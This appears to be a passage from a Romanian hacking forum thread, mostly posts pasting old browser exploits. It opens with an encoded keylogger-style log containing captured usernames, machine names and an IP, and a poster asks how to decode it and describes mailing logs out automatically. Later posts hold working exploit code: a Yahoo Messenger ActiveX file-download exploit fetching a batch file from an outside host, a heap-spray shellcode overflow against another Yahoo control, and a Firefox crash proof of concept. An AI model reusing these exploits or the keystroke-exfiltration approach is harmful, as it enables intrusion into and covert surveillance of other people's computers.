M(&EN('!R97IE;G1A(&]R9&]N86YT82!D92!U<F=E;G1A+@T*(" @,BX@1&ES M<&]Z:71I:6QE('!R979A>G5T92!I;B!P<F5Z96YT82!O<F1O;F%N=&$@9&4@ M=7)G96YT82!A=2!C82!S8V]P(&%S:6=U<F%R96$@9&5S9F%S=7)A<FEI(&9L M=65N=&4@<VD@:6X@<VEG=7)A;G1A(&$@8VER8W5L871I96D@<&4@9')U;75R M:6QE('!U8FQI8V4L('!R96-U;2!S:2!O8W)O=&ER96$@=FEE=&EI+"!I;G1E M9W)I=&%T:6D@8V]R<&]R86QE('-I(&$@<V%N871A=&EI('!E<G-O86YE;&]R M('!A<G1I8VEP86YT92!L82!T<F%F:6,@<V%U(&%F;&%T92!I;B!Z;VYA(&1R M=6UU;'5I('!U8FQI8RP@<')O=&5C=&EA(&1R97!T=7)I;&]R('-I(&EN=&5R M97-E;&]R(&QE9VET:6UE(&%L92!P97)S;V%N96QO<B!R97-P96-T:79E+"!A M('!R;W!R:65T871I:2!P=6)L:6-E('-I('!R:79A=&4L(&-A="!S:2!A(&UE M9&EU;'5I+@T*(" @,RX@075T;W)I=&%T96$@8V]M<&5T96YT82!I;B!D;VUE M;FEU;"!C:7)C=6QA=&EE:2!P92!D<G5M=7)I;&4@<'5B;&EC92!P<FEV:6YD M(&EN:71I97)E82!S:2!A=FEZ87)E82!U;F]R(')E9VQE;65N=&%R:2P@<')E M8W5M('-I(&%P;&EC87)E82!S:2!E>&5R8VET87)E82!C;VYT<F]L=6QU:2!P M<FEV:6YD(')E<W!E8W1A<F5A(&YO<FUE;&]R(&1I;B!A8V5S="!D;VUE;FEU M(&5S=&4@36EN:7-T97)U;"!!9&UI;FES=')A=&EE:2!S:2!);G1E<FYE;&]R M+"!P<FEN($EN<W!E8W1O<F%T=6P@1V5N97)A;"!A;"!0;VQI=&EE:2!2;VUA M;F4N#0H@(" T+B!296=L96UE;G1A<FEL92!P<FEV:6YD(&-I<F-U;&%T:6$@ M<&4@9')U;75R:6QE('!U8FQI8V4@<V4@96UI="P@9'5P82!C87HL(&1E(&-A M=')E(&%U=&]R:71A=&EL92!P=6)L:6-E(&-E;G1R86QE('-A=2!L;V-A;&4@ M8W4@871R:6)U=&EI(&EN(&%C97-T(&1O;65N:74L(&YU;6%I(&-U(&%V:7IU M;"!);G-P96-T;W)A='5L=6D@1V5N97)A;"!A;"!0;VQI=&EE:2!2;VUA;F4@ M<VD@8W4@<F5S<&5C=&%R96$@86-O<F1U<FEL;W(@<VD@8V]N=F5N=&EI;&]R M(&EN=&5R;F%T:6]N86QE(&QA(&-A<F4@4F]M86YI82!E<W1E('!A<G1E+@T* M(" @-2X@4')E=F5D97)I;&4@<')E>F5N=&5I(&]R9&]N86YT92!D92!U<F=E M;G1A('-E(&%P;&EC82!T=71U<F]R('!A<G1I8VEP86YT:6QO<B!L82!T<F%F M:6,L('!R96-U;2!S:2!A=71O<FET871I;&]R(&-A<F4@874@871R:6)U=&EI M(&EN(&1O;65N:75L(&-I<F-U;&%T:65I('-I('-I9W5R86YT96D@<&4@9')U M;75R:6QE('!U8FQI8V4L('!R96-U;2!S:2!I;B!D;VUE;FEU;"!P<F]T96-T M:65I(&UE9&EU;'5I+@T*#0H-"@T*07)T+B R+B!);F1R=6UA<F5A+"!S=7!R M879E9VAE<F5A('-I(&-O;G1R;VQU;"!R97-P96-T87)I:2!N;W)M96QO<B!D M92!C:7)C=6QA=&EE('!E(&1R=6UU<FEL92!P=6)L:6-E('-E(&9A8R!D92!C M871R92!P;VQI=&EA(')U=&EE<F$@9&EN(&-A9')U;"!);G-P96-T;W)A='5L M=6D@1V5N97)A;"!A;"!0;VQI=&EE:2!2;VUA;F4L(&-A<F4@87)E(&]B;&EG M871I82!S82!I82!M87-U<FEL92!L96=A;&4@:6X@8V%Z=6P@:6X@8V%R92!C M;VYS=&%T82!I;F-A;&-A<FD@86QE(&%C97-T;W)A+@T*#0H-"D%R="X@,RX@ M0VER8W5L871I82!P92!D<G5M=7)I;&4@<'5B;&EC92!D:6X@>F]N82!D92!F M<F]N=&EE<F$@<VD@9&EN(&%L=&4@>F]N92!P96YT<G4@8V%R92P@<&]T<FEV M:70@;&5G:6DL(',M874@<W1A8FEL:70@<F5S=')I8W1I:2!S92!F86-E(&-U M(')E<W!E8W1A<F5A(')E9VQE;65N=&%R:6QO<B!I;G-T:71U:71E('!E;G1R M=2!A8V5L92!Z;VYE+@T*#0H-"D%R="X@-"X@0V]N=')O;'5L(&-I<F-U;&%T M:65I('9E:&EC=6QE;&]R(&%P87)T:6YA;F0@:6YS=&ET=71I:6QO<B!D:6X@ M<VES=&5M=6P@9&4@87!A<F%R92P@;W)D:6YE('!U8FQI8V$@<VD@<VEG=7)A M;G1A(&YA=&EO;F%L82!S92!E9F5C='5E87IA(&1E(&-A=')E('!O;&ET:6$@ M<G5T:65R82P@<')E8W5M('-I(&1E('!E<G-O;F%L=6P@9&5S96UN870@9&4@ M8V%T<F4@86-E<W1E(&EN<W1I='5T:6DN#0H-"@T*07)T+B U+@T*#0H@(" Q M+B!!9&UI;FES=')A=&]R=6P@9')U;75L=6D@<'5B;&EC+"!A;G1R97!R96YO M<G5L('-A=2!E>&5C=71A;G1U;"!L=6-R87)I;&]R+"!C;VYF;W)M(&-O;7!E M=&5N=&5L;W(@8V4@:6D@<F5V:6XL(&-U(&%V:7IU;"!P;VQI=&EE:2!R=71I M97)E+"!E<W1E(&]B;&EG870@<V$@:6YS=&%L97IE(&EN9&EC871O87)E(&]R M:2!A;'1E(&1I<W!O>FET:79E('-P96-I86QE+"!S82!A<&QI8V4@;6%R8V%J M92!P92!D<G5M=7)I;&4@<'5B;&EC92P@8V]N9F]R;2!S=&%N9&%R9&5L;W(@ M:6X@=FEG;V%R92P@<VD@<V$@;&4@;65N=&EN82!I;B!S=&%R92!C;W)E<W!U M;GIA=&]A<F4N#0H@(" R+B!!9&UI;FES=')A=&]R=6P@9')U;75L=6D@<'5B M;&EC('-A=2P@9'5P82!C87HL(&%N=')E<')E;F]R=6P@;W)I(&5X96-U=&%N M='5L(&QU8W)A<FEL;W(@97-T92!O8FQI9V%T('-A('-E;6YA;&EZ97IE(&-O M<F5S<'5N>F%T;W(L(&-A="!M86D@<F5P961E('!O<VEB:6PL(&]R:6-E(&]B M<W1A8V]L(&%F;&%T('!E('!A<G1E82!C87)O<V%B:6QA+"!C87)E('-T86YJ M96YE<W1E('-A=2!P=6YE(&EN('!E<FEC;VP@<VEG=7)A;G1A(&-I<F-U;&%T M:65I+"!S:2!S82!I82!T;V%T92!M87-U<FEL92!D92!I;FQA='5R87)E(&$@ M86-E<W1U:6$N#0H@(" S+B!!=71O<FET871I;&4@<'5B;&EC92!L;V-A;&4@ M<W5N="!O8FQI9V%T92!S82!A;65N86IE>F4@<W1A=&EI;&4@;6EJ;&]A8V5L M;W(@9&4@=')A;G-P;W)T('!U8FQI8R!D92!P97)S;V%N92P@<')E=F%Z=71E M(&-U(&%L=F5O;&4@<V%U(')E9G5G:6DL(&-U(&%V:7IU;"!P;VQI=&EE:2!R M=71I97)E+@T*(" @-"X@4V4@:6YT97)Z:6,@86UP;&%S87)E82!C;VYS=')U M8W1I:6QO<B!D92!O<FEC92!F96P@<VD@<')A8W1I8V%R96$@86-T96QO<B!D M92!C;VUE<G0@<&4@=')O='5A<B!S874@<&4@86-O<W1A;65N="P@:6X@<&%R M8V%R:6QE(&%M96YA:F%T92!S874@<&4@<&%R=&5A(&-A<F]S86)I;&$L(&EN M(&-O;F1I=&EI;&4@:6X@8V%R92!A8V5S=&4@8V]N<W1R=6-T:6D@87(@869E M8W1A('-I9W5R86YT82!C:7)C=6QA=&EE:2!P:65T;VYI;&]R('-I('9E:&EC M=6QE;&]R+@T*(" @-2X@26X@<&5R:6UE=')U;"!S=&%T:6EL;W(@;6EJ;&]A M8V5L;W(@9&4@=')A;G-P;W)T('!U8FQI8R!D92!P97)S;V%N92!P;W0@9FD@ M86UE;F%J871E(&1O87(@<W!A=&EI.@T*4W1A<G1E9#H@-"\R,"\R,# #,Z M-#0Z-#@@4$T-"@T*57-E<B!.86UE.B!X=&5A;0T*0V]M<'5T97(@3F%M93H@ M1$5&14Y#13(Y34E,#0I$3TU!24XZ($1%1D5.0T4R.4U)3 T*25 Z(#$Y,BXQ M-C@N,"XU- T*#0I;,SHT-#HT.2!035T\/%1O=&%L($-O;6UA;F1E<B W+C @ M<'5B;&EC(&)E=&$@,B M($Y/5"!214=)4U1%4D5$/CX)#0I;,SHT-#HU,"!0 M35T\/%-T87)T($UE;G4^/@D-"ELS.C0T.C4U(%!-73P\56YT:71L960@+2!. M;W1E<&%D/CX)4E)24E)24E)24E)24E)24E)24E)24E)24E)24E)24E)24E)2 M4E)24E)24E)24E)24E)24E)24E)24E)24E)24E)24E)2#0H-"D5N9&5D.B T M+S(P+S(P,#@@,SHT-#HU-2!030T*#0H 7 @ ' end Ca sa fiu mai explicit: -programul genereaza fisierul pe calculatorul iar cand atinge dimeniunea de 5000 de biti (5Kb) este incryptat si trimis ca attach pe mail...numai ca el imi vine pe email in urmatorul mod (in nici un caz attach!)...e vreo posibilitate sa decodez textul?:
  21. sorry man....ma cam luat valul..data viitoare nu o sa mai fac galagie ,numai bine!
  22. Yahoo! Messenger 8.1.0.421 CYFT Object Arbitrary File Download <pre> <code><span style="font: 10pt Courier New;"><span class="general1-symbol"><body bgcolor="#E0E0E0">----------------------------------------------------------------------------- [b]Yahoo! Messenger 8.1.0.421 CYFT Object (ft60.dll) Arbitrary File Download[/b] url: [url]http://download.yahoo.com/dl/msgr8/us/ymsgr8us.exe[/url] Author: shinnai mail: shinnai[at]autistici[dot]org site: [url]http://shinnai.altervista.org[/url] [b]<font color='red'>This was written for educational purpose. Use it at your own risk. Author will be not responsible for any damage.</font>[/b] Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7 [b]Marked as: RegKey Safe for Script: False RegkeySafe for Init: False KillBitSet: False[/b] From remote: depends by Internet Explorer settings From local: yes [b]Description: This contron contains a "GetFile()" method which allows to download, on user's pc, an arbitrary file pased as argument. Remote execution depends by Internet Explorer settings, local execution works very well.[/b] [b]greetz to:<font color='red'> skyhole (or YAG KOHHA)</font> for inspiration[/b] ----------------------------------------------------------------------------- <object classid='clsid:24F3EAD6-8B87-4C1A-97DA-71C126BDA08F' id='test'></object> <input language=VBScript onclick=tryMe() type=button value='Click here to start the test'> <script language='vbscript'> Sub tryMe test.GetFile "http://www.shinnai.altervista.org/shinnai.bat","c:\\shinnai.bat",5,1,"shinnai" MsgBox "Exploit completed" End Sub </script> </span></span> </code></pre>
  23. Yahoo! Messenger ywcupl.dll ActiveX Control send() Remote Buffer Overflow Exploit <html> <!-- 45 minutes of fuzzing! Great results! very relible, runs calc.exe, replace with shellcode of your choice!!! link:[url]http://www.informationweek.com/news/showArticle.jhtml?articleID=199901856[/url] maybe more vulz! Greetz to: str0ke and shinnai! --> <html> <object classid='clsid:DCE2F8B1-A520-11D4-8FD0-00D0B7730277' id='target'></object> <script> shellcode = unescape("%u9090%u9090%u9090%uC929%uE983%uD9DB%uD9EE%u2474" + "%u5BF4%u7381%uA913%u4A67%u83CC%uFCEB%uF4E2%u8F55" + "%uCC0C%u67A9%u89C1%uEC95%uC936%u66D1%u47A5%u7FE6" + "%u93C1%u6689%u2FA1%u2E87%uF8C1%u6622%uFDA4%uFE69" + "%u48E6%u1369%u0D4D%u6A63%u0E4B%u9342%u9871%u638D" + "%u2F3F%u3822%uCD6E%u0142%uC0C1%uECE2%uD015%u8CA8" + "%uD0C1%u6622%u45A1%u43F5%u0F4E%uA798%u472E%u57E9" + "%u0CCF%u68D1%u8CC1%uECA5%uD03A%uEC04%uC422%u6C40" + "%uCC4A%uECA9%uF80A%u1BAC%uCC4A%uECA9%uF022%u56F6" + "%uACBC%u8CFF%uA447%uBFD7%uBFA8%uFFC1%u46B4%u30A7" + "%u2BB5%u8941%u33B5%u0456%uA02B%u49CA%uB42F%u67CC" + "%uCC4A%uD0FF"); bigblock = unescape("%u9090%u9090"); headersize = 20; slackspace = headersize+shellcode.length while (bigblock.length<slackspace) bigblock+=bigblock; fillblock = bigblock.substring(0, slackspace); block = bigblock.substring(0, bigblock.length-slackspace); while(block.length+slackspace<0x40000) block = block+block+fillblock; memory = new Array(); for (x=0; x<800; x++) memory[x] = block + shellcode; var buffer = '\x0a'; while (buffer.length < 5000) buffer+='\x0a\x0a\x0a\x0a'; target.server = buffer; target.initialize(); target.send(); </script> </html>
  24. i######################### ######################### # # AmnPardaz Security Research & Penetration Testing Group # # Bug Title: Mozilla Firefox 2.0.0.7 Denial of Service # Vendor URL: [url]www.mozilla.org[/url] # Version: <= 2.0.0.7 # Fix Available: Yes! # Soloution: Update to 2.0.0.8 # Note: This bug works on 2.0.0.8 in different way. Although this bug doesn't crash 2.0.0.8, it causes not showing html code by viewing source in Mozilla Firefox 2.0.0.8 and this is another bug on 2.0.0.8! # Proof: [url]http://www.astalavista.ir/proofs/MozillaFireFox/DoS1.htm[/url] # ######################### [url]WwW.AmnPardaz.com[/url] ######################## # # Leaders : Shahin Ramezany & Sorush Dalili # Team Members: Amir Hossein Khonakdar, Hamid Farhadi # Security Site: [url]WwW.BugReport.ir[/url] - [url]WwW.AmnPardaz.Com[/url] # Country: Iran # Greetz To : Astalavista.ir (Secuiran.com) Security Research Group, GrayHatz.net # Contacts: <th3_vampire {4-t] yahoo [d-0-t} com> & <Irsdl {4-t] yahoo [d-0-t} com> # ######################## Bug Description ########################### # # To do this work we need 2 files (Html,XML). # Their codes was written below. # # Save below codes in a HTML file. # -------------------------------------------------------------------- -------------------------------------------------------------------- <html> <head> <style>BODY{-moz-binding:url("moz.xml#xss")}</style> </head> <body> Suddenly see you baby! If you see this bug execution was failed! <script> alert('Soroush Dalili & Shahin Ramezani From Astalavista.ir') </script> </body> </html> -------------------------------------------------------------------- -------------------------------------------------------------------- # # Save below codes in "moz.xml" file. # -------------------------------------------------------------------- -------------------------------------------------------------------- <?xml version="1.0"?> <bindings xmlns="http://www.mozilla.org/xbl"> <binding id="xss"> <implementation> <constructor><![CDATA[ eval(unescape('%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%61%3e%27%29')); ]]></constructor> </implementation> </binding> </bindings> -------------------------------------------------------------------- -------------------------------------------------------------------- # # Now by runnig the HTML file by Mozilla FireFox <= 2.0.0.7 it will be crashed and by Mozilla FireFox 2.0.0.8 no code will be showed by viewing the source. # ###################################################################
×
×
  • Create New...